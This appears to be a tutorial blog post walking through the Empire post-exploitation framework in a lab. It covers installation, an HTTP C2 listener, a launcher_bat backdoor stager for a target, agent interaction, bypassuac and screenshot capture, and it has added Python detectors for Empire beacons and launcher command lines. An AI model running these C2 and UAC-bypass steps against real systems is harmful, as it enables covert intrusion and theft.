Basic use of the post-exploitation framework Empire

1. Installation

1.1 System environment

  • Debian-family Linux, such as Ubuntu or Kali (this post uses Kali)

1.2 Install commands

  At the end of the install you are prompted for a username and password.

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd Empire-master
cd setup/
./install.sh

1.3 Test launch

root@kali:~# cd Empire
root@kali:~/Empire# ./empire

2. Usage

2.1 Basic usage

# list the available commands with help
(Empire) > help

2.2 Create a listener

  • tip 1: Tab completion works for command and module names
  • tip 2: overview of the listener modules
*  http[s]: communicates over HTTP or HTTPS.
*  http_com: communicates through Internet Explorer's COM component.
*  http_foreign: no obvious difference from http.
*  http_hop: forwards received requests to another listener, presumably for relaying C2.
*  dbx/onedrive: uses Dropbox or OneDrive as the relay for traffic, much like remote-access tools that check in via QQ Zone or Weibo.
*  http_mapi: checks in through email (MAPI).
*  meterpreter: needs no introduction.
  • tip 3: this walkthrough uses the http listener
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener
dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector
(Empire: listeners) > uselistener http
(Empire: listeners/http) >

This creates a listener with no configuration applied yet.

2.3 Configure the listener

Much like msf: info shows the current configuration, set assigns an option value.

(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name monitor
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        monitor                          Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://172.16.204.143:80         Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        63a9f0ea7bb98050796b649e85481845 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        8080                             Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) >
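The info output above shows the listener's DefaultProfile as a list of request URIs, a pipe, and a User-Agent, with DefaultDelay 5 and DefaultJitter 0.0. The following is an added defender-side example, not code from the post or from the Empire project: it parses that profile string and scans constructed web-proxy log lines (format assumed) for a client that hits the profile URIs with the profile User-Agent at a near-constant interval.

```python
# Added defender-side example; not part of the original post or the Empire project.
# Parses an Empire-style communication profile ("uri1,uri2,...|User-Agent") and
# scans constructed proxy log lines for clients that request those URIs with that
# User-Agent at a fixed interval (DefaultDelay 5 with DefaultJitter 0.0 above).
from collections import defaultdict
from datetime import datetime

# Values exactly as shown by the listener's "info" output.
EMPIRE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
DEFAULT_PROFILE = "/admin/get.php,/news.php,/login/process.php|" + EMPIRE_UA

def parse_profile(profile):
    """Split 'uri,uri,...|user-agent' into (set_of_uris, user_agent)."""
    uris, _, user_agent = profile.partition("|")
    return {u.strip() for u in uris.split(",") if u.strip()}, user_agent.strip()

def find_beacons(log_lines, profile=DEFAULT_PROFILE, min_hits=3, max_spread=1.0):
    """Return {client_ip: [gaps_in_seconds]} for clients whose requests match the
    profile URIs and User-Agent and recur with gaps that differ by <= max_spread."""
    uris, ua = parse_profile(profile)
    times = defaultdict(list)
    for line in log_lines:
        # Assumed log format: '<ISO time> <client_ip> <method> <path> <status> "<user-agent>"'
        ts, ip, _method, path, _status, rest = line.split(" ", 5)
        if path.split("?")[0] in uris and rest.strip('"') == ua:
            times[ip].append(datetime.fromisoformat(ts))
    hits = {}
    for ip, stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if max(gaps) - min(gaps) <= max_spread:   # jitter 0.0 => near-identical gaps
            hits[ip] = gaps
    return hits

# Constructed sample: one host checks in every 5 s; another browses the site normally.
SAMPLE_LOG = [
    f'2019-03-16T11:30:00 172.16.204.80 GET /news.php 200 "{EMPIRE_UA}"',
    f'2019-03-16T11:30:05 172.16.204.80 GET /admin/get.php 200 "{EMPIRE_UA}"',
    f'2019-03-16T11:30:10 172.16.204.80 POST /login/process.php 200 "{EMPIRE_UA}"',
    f'2019-03-16T11:30:15 172.16.204.80 GET /news.php 200 "{EMPIRE_UA}"',
    '2019-03-16T11:30:02 172.16.204.90 GET /news.php 200 "Mozilla/5.0 (X11; Linux x86_64) Firefox/65.0"',
    '2019-03-16T11:31:40 172.16.204.90 GET /index.html 200 "Mozilla/5.0 (X11; Linux x86_64) Firefox/65.0"',
]

if __name__ == "__main__":
    for ip, gaps in find_beacons(SAMPLE_LOG).items():
        print(f"{ip}: {len(gaps) + 1} profile hits, intervals {gaps}")
```

Operators change DefaultProfile, DefaultJitter and ServerVersion, so treat the default values as a starting point and the interval regularity as the more durable signal.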

2.4 Start the listener

(Empire) > execute

2.5 Generate the backdoor file

Use usestager to generate the file the target is lured into running; the listing shows that Linux, Windows and macOS are supported.

(Empire: listeners) > usestager windows/
backdoorLnkMacro  csharp_exe        ducky             launcher_bat      launcher_sct      launcher_xml      macroless_msword  teensy
bunny             dll               hta               launcher_lnk      launcher_vbs      macro             shellcode
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > info

Now configure it.

  • tip 1: the Listener value must match the listener's name
(Empire: stager/windows/launcher_bat) > set Listener monitor
(Empire: stager/windows/launcher_bat) > execute

The generated file is shown in the figure.
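The listener's Launcher option above is "powershell -noP -sta -w 1 -enc", so a launcher_bat that runs on a host appears in process-creation telemetry as PowerShell started with that flag combination and a base64 argument. The following is an added defender-side example, not code from the post or from the Empire project: it checks constructed command lines (a benign payload, constructed here) for that pattern and decodes the -enc value, which PowerShell reads as base64 of UTF-16LE text.

```python
# Added defender-side example; not part of the original post or the Empire project.
# Flags process command lines matching the launcher pattern shown in the listener's
# Launcher option ("powershell -noP -sta -w 1 -enc ...") and decodes the -enc argument.
import base64
import re

# Abbreviated switches from the Launcher string; matched case-insensitively and by
# prefix because PowerShell accepts -NoProfile / -nop / -noP alike.
LAUNCHER_FLAGS = {"-nop": "-NoProfile", "-sta": "-Sta", "-w": "-WindowStyle", "-enc": "-EncodedCommand"}

def decode_encoded_command(b64):
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE); None if invalid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_command_line(cmdline):
    """Return {'flags': [...], 'decoded': str|None} for a launcher-style line, else None."""
    argv = cmdline.split()   # simple whitespace split; enough for the constructed samples
    if not argv or not re.search(r"powershell(\.exe)?$", argv[0], re.I):
        return None
    seen, encoded = set(), None
    for i, arg in enumerate(argv[1:], start=1):
        a = arg.lower()
        for short in LAUNCHER_FLAGS:
            if a.startswith(short):
                seen.add(short)
                if short == "-enc" and i + 1 < len(argv):
                    encoded = argv[i + 1]
    if {"-nop", "-w", "-enc"} <= seen:   # the launcher's distinctive combination
        return {"flags": sorted(seen), "decoded": decode_encoded_command(encoded or "")}
    return None

# Constructed samples: a launcher-shaped line with a harmless payload, and a normal script run.
SAMPLE_PAYLOAD = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    f"powershell -noP -sta -w 1 -enc {SAMPLE_PAYLOAD}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(inspect_command_line(line) or "no match", "<-", line[:60])
```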

3. Send it to the target and execute

3.1 Getting the connection back after it runs

However it was run, the shell came back.

(Empire: agents) > agents

3.2 Interact with the callback and try bypassuac

(Empire: agents) > interact 29F438CA
(Empire: 29F438CA) >
(Empire: 29F438CA) > bypassuac monitor

3.3 Some operations

  • 3.3.1 Screenshot
(Empire: 29F438CA) > sc
[*] Tasked 29F438CA to run TASK_CMD_WAIT_SAVE
[*] Agent 29F438CA tasked with task ID 2
[*] Tasked agent 29F438CA to run module powershell/collection/screenshot
(Empire: 29F438CA) > [+] File screenshot/CLIENT_2019-03-16_11-30-01.png from 29F438CA saved
[*] Agent 29F438CA returned results.
Output saved to ./downloads/29F438CA/screenshot/CLIENT_2019-03-16_11-30-01.png
[*] Valid results returned by 172.16.204.80

  • 3.3.2 List the available modules
(Empire: 29F438CA) > usemodule

  • 3.3.3 Show the agent commands
(Empire: 29F438CA) > help agentcmds

  • 3.3.4 Run ipconfig as an example
(Empire: 29F438CA) > ipconfig

  • 3.3.5 Type help to list the commands; these are agent commands, not shell commands
(Empire: 29F438CA) > help

What each command does is self-explanatory, especially if you have done penetration testing before, so I won't go through them.